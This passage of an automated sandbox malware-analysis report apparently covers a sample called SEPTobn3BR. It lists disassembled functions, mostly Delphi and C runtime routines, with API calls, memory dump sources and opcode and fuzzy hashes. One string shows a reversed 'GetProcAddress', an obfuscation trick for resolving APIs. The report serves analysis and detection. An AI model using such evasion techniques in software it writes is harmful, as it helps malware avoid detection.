                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Locale$InfoThread
                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                              • API String ID: 4232894706-2493093252
                                                              • Opcode ID: 0112cd8a0600c2f5f8463af608924ab94a1c249eef71fab711c2567a4f43b4a7
                                                              • Instruction ID: c5fa57966ade0b56cb1a458e1b7017eb423cfe53864a923d7e3de9709bfc1ab0
                                                              • Opcode Fuzzy Hash: 0112cd8a0600c2f5f8463af608924ab94a1c249eef71fab711c2567a4f43b4a7
                                                              • Instruction Fuzzy Hash: D0618F39B001499BDB05FBB4D890ADFBBBBDF88340F5098F6E119AB641DA34D905DB60
                                                              Function 02B9AE20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9AE40
                                                              • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B9AE57
                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9AEEB
                                                              • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B9AEF7
                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B9AF0B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Read$HandleModule
                                                              • String ID: KernelBase$LoadLibraryExA
                                                              • API String ID: 2226866862-113032527
                                                              • Opcode ID: ca1fb2cd571423cc2eb2c176b15433eddfa9c5593db0a2289458904e13997d3b
                                                              • Instruction ID: 2faddc9b46a8df2df9eb2a9c23cd56d7f685c8f3ba8683e07fda3a656218678a
                                                              • Opcode Fuzzy Hash: ca1fb2cd571423cc2eb2c176b15433eddfa9c5593db0a2289458904e13997d3b
                                                              • Instruction Fuzzy Hash: 01314FB2A40705BBDF20DF68DC85F9A77ACEF05364F1045A4FA58EB280D770A950CBA4
                                                              Function 02B8432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?,02BE07C8,?,?,02BAD7A8,02B8655D,02BAC30D), ref: 02B84365
                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?,02BE07C8,?,?,02BAD7A8,02B8655D,02BAC30D), ref: 02B8436B
                                                              • GetStdHandle.KERNEL32(000000F5,02B843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?,02BE07C8), ref: 02B84380
                                                              • WriteFile.KERNEL32(00000000,000000F5,02B843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?), ref: 02B84386
                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B843A4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileHandleWrite$Message
                                                              • String ID: Error$Runtime error at 00000000
                                                              • API String ID: 1570097196-2970929446
                                                              • Opcode ID: 7151a556e8287c482eefed0fdd0200f8faef3f0bb8349286e844497f575f66b4
                                                              • Instruction ID: c4b095727fee88f413ee093a6f8cc27ca9565a40b4b4b3c70ea8e5bb2a31ce63
                                                              • Opcode Fuzzy Hash: 7151a556e8287c482eefed0fdd0200f8faef3f0bb8349286e844497f575f66b4
                                                              • Instruction Fuzzy Hash: 8EF02470AD6302B9FB10B664AC16FA9332C8700F54F508AD4B23CA90D0D7A090C5CB26
                                                              Function 02C22885 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: 8:G
                                                              • API String ID: 269201875-405301104
                                                              • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                                              • Instruction ID: 3699a3f12da4b0261a486a328ee9cad72de2f1764164bd8ca2c21f407f7a7d90
                                                              • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                                              • Instruction Fuzzy Hash: 4241E476A002249FCB14EF78C880A5AB7E6EF89314B1541A9D905FB381DB71AA05DB51
                                                              Function 02C2F666 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                              • Instruction ID: 12b31b9a593537ddf086529712a0a0cdf887da533e3c68510401c381837a4957
                                                              • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                              • Instruction Fuzzy Hash: 50116371540B2CBAD520BBB1CD05FCB7BAE5F00700F804819B69E66491DE79B50DAF50
                                                              Function 02B8AE4C Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02B8ACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B8ACE1
                                                                • Part of subcall function 02B8ACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B8AD05
                                                                • Part of subcall function 02B8ACC4: GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B8AD20
                                                                • Part of subcall function 02B8ACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B8ADB6
                                                              • CharToOemA.USER32(?,?), ref: 02B8AE83
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEA0
                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEA6
                                                              • GetStdHandle.KERNEL32(000000F4,02B8AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEBB
                                                              • WriteFile.KERNEL32(00000000,000000F4,02B8AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEC1
                                                              • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B8AEE3
                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B8AEF9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                              • String ID:
                                                              • API String ID: 185507032-0
                                                              • Opcode ID: c82d30bce22976e294cee82e6a78cb1d9155dfa4e1a66fd4e1114cac8f7cc825
                                                              • Instruction ID: 0f745b5eed8af571ed9bc69d3115d836435d580107718c0f5a7e82c8a9a92695
                                                              • Opcode Fuzzy Hash: c82d30bce22976e294cee82e6a78cb1d9155dfa4e1a66fd4e1114cac8f7cc825
                                                              • Instruction Fuzzy Hash: D4117CB6584244BAD200FBA4CC81FDB7BEDAB45700F4009A6B748DB0E0EA74E944CF62
                                                              Function 02C19E08 Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __allrem.LIBCMT ref: 02C19F95
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C19FB1
                                                              • __allrem.LIBCMT ref: 02C19FC8
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C19FE6
                                                              • __allrem.LIBCMT ref: 02C19FFD
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C1A01B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1992179935-0
                                                              • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                              • Instruction ID: 6bd442c89309bfc335480d5bd8685546eb6549edd52eff1ef8f6ff7a838a70ed
                                                              • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                              • Instruction Fuzzy Hash: 4F814E72A00705AFE724EE78CC52B6A73E9AF86364F14452EE415D7280EB74DA00EFD5
                                                              Function 02C222C5 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: a169deee8d6ced91b4625a1f20bcaf9c98a75f3c366a0d0b8970e9d133f6d33b
                                                              • Instruction ID: 3c1b5b7afdea362396617ec608c2421219373dedc24d6018c991f51c97c546fb
                                                              • Opcode Fuzzy Hash: a169deee8d6ced91b4625a1f20bcaf9c98a75f3c366a0d0b8970e9d133f6d33b
                                                              • Instruction Fuzzy Hash: FB51AD369042346BDF28DF68D840BBBB7ADDF85364F14415AEC489B280EF719E0AC691
                                                              Function 02C24397 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __cftoe
                                                              • String ID:
                                                              • API String ID: 4189289331-0
                                                              • Opcode ID: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                                              • Instruction ID: 40f006fb4f1aa663b0a50f5a7c8f1722e492b166a9239f4130ba0d7eac665faf
                                                              • Opcode Fuzzy Hash: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                                              • Instruction Fuzzy Hash: A2512D72900225ABDF3DDF698C41FAE77A9EF89334F504129F819A7181DF31D608DA64
                                                              Function 02B8E514 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B8E5AD
                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B8E5C9
                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B8E602
                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B8E67F
                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B8E698
                                                              • VariantCopy.OLEAUT32(?,00000000), ref: 02B8E6CD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                              • String ID:
                                                              • API String ID: 351091851-0
                                                              • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                              • Instruction ID: f59486620b0a623526fe5d36b74fdb37e94f2ff98b0fb904cdc1ff630e0f3710
                                                              • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                              • Instruction Fuzzy Hash: B151B7759006299BCB26EB68C880BD9B3BDAF4D310F4441D6E50DA7252D630EF85CF61
                                                              Function 02BF0E43 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 02BF0E50
                                                              • int.LIBCPMT ref: 02BF0E63
                                                                • Part of subcall function 02BEE075: std::_Lockit::_Lockit.LIBCPMT ref: 02BEE086
                                                                • Part of subcall function 02BEE075: std::_Lockit::~_Lockit.LIBCPMT ref: 02BEE0A0
                                                              • std::_Facet_Register.LIBCPMT ref: 02BF0EA3
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 02BF0EAC
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02BF0ECA
                                                              • __Init_thread_footer.LIBCMT ref: 02BF0F0B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                              • String ID:
                                                              • API String ID: 3815856325-0
                                                              • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                                              • Instruction ID: d35417a121886f1ce03b71e735fd61f1b88367dc0c0257b2196b62ceac7e1435
                                                              • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                                              • Instruction Fuzzy Hash: 1A210532900114EBCB14FBA8E8429DD77B9DF05320F2005EAE945A72E1EF349E45AFD5
                                                              Function 02B83568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B8358A
                                                              • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B835BD
                                                              • RegCloseKey.ADVAPI32(?,02B835E0,00000000,?,00000004,00000000,02B835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B835D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                              • API String ID: 3677997916-4173385793
                                                              • Opcode ID: e3fc2b7c5d7656280f428c1df30e8eecfd4e3e76b72d5c25e92f183de5152bb8
                                                              • Instruction ID: 190acc5e9fee44fa69fdcc95c65f4ed835178289655a51984ba65afd81c76963
                                                              • Opcode Fuzzy Hash: e3fc2b7c5d7656280f428c1df30e8eecfd4e3e76b72d5c25e92f183de5152bb8
                                                              • Instruction Fuzzy Hash: 0B01D875954308BAF711EF94CD03BBDB7ECE708B10F1005E1BA08D7990E6749611CB59
                                                              Function 02B980C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                              • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                              • GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: Kernel32$sserddAcorPteG
                                                              • API String ID: 667068680-1372893251
                                                              • Opcode ID: f79e5afb4bfdc242174ea7ac60c4f2ec830e9226a633e9e378820ee9156b0b47
                                                              • Instruction ID: af86d6966c1a6d325e1fe9ca05e6ffb44cecfc31540bcc4d4edde7ba96c8444c
                                                              • Opcode Fuzzy Hash: f79e5afb4bfdc242174ea7ac60c4f2ec830e9226a633e9e378820ee9156b0b47
                                                              • Instruction Fuzzy Hash: 4C012C79A50304BFEF00EBA8D841A9E77BEEB49710F5188A4F50897A10DA34A910CE24
                                                              Function 02C23799 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
